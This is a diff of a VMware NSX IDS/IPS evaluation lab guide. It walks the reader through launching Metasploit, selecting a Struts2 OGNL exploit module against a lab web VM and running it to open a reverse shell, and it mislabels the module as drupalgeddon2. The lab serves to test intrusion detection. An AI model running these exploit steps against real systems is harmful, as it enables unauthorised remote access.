vmware-nsx/eval-docs-ids-ips/docs/8-AdvancedAttackandConfiguration.md

 1. From the console session with  **External VM**, type **sudo msfconsole** to launch **Metasploit**.
 Enter **VMware1!** if prompted for a password.
 Follow the below steps to initiate the exploit.
 Hit **enter** between every step.
     * Type **use exploit/multi/http/struts2_namespace_ognl** to select the drupalgeddon2 exploit module
     * Type **set RHOST 192.168.10.101** to define the IP address of the victim to attack.
 The IP address should match the IP address of **App1-WEB-TIER VM**
-    * Type **exploit -z** to initiate the exploit, esbalish a reverse shell, and background the session.
+    * Type **exploit** to initiate the exploit, esbalish a reverse shell, and background the session.

 > **Note**: This exploit will fail as  **App1-WEB-TIER VM** is not running an Apache Struts service vulnerable to this exploit.